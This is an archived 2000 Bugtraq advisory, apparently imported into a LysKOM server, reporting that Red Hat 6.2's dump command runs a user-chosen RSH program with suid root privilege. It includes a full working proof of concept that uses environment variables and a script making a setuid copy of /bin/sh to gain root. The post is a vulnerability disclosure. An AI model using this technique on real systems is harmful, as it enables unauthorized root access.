5663064 2000-10-31 14:37 +0900  /36 rader/ JW Oh <mat@IVNTECH.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2000-10-31  18:51  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: mat@IVNTECH.COM
Mottagare: Bugtraq (import) <13520>
Ärende: Redhat 6.2 dump command executes external program with suid
------------------------------------------------------------
 priviledge.
From: JW Oh <mat@IVNTECH.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.10.10010311436050.31338-100000@ivntech.com>

1. Problem:
 Linux dump command executes external program with suid priviledge.
2. Tested Version
 dump-0.4b15
3. Example
 [mat@localhost mat]$ export TAPE=garbage:garbage
[mat@localhost mat]$ export RSH=/home/mat/execute_this
[mat@localhost mat]$ cat > /home/mat/execute_this
#!/bin/sh
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
[mat@localhost mat]$ chmod 755 /home/mat/execute_this
[mat@localhost mat]$ /sbin/dump -0 /
  DUMP: Connection to garbage established.
  DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
  DUMP: Date of last level 0 dump: the epoch
  DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
  DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
 [mat@localhost mat]$ ls -la /home/mat/sh
 -rwsr-xr-x    1 root     tty        316848 Oct 31 14:38 /home/mat/sh
 [mat@localhost mat]$ /home/mat/sh
 bash# id
 uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)
=================================================
|                                               |
|               mat@hacksware.com               |
|                                               |
=================================================
(5663064) ------------------------------------------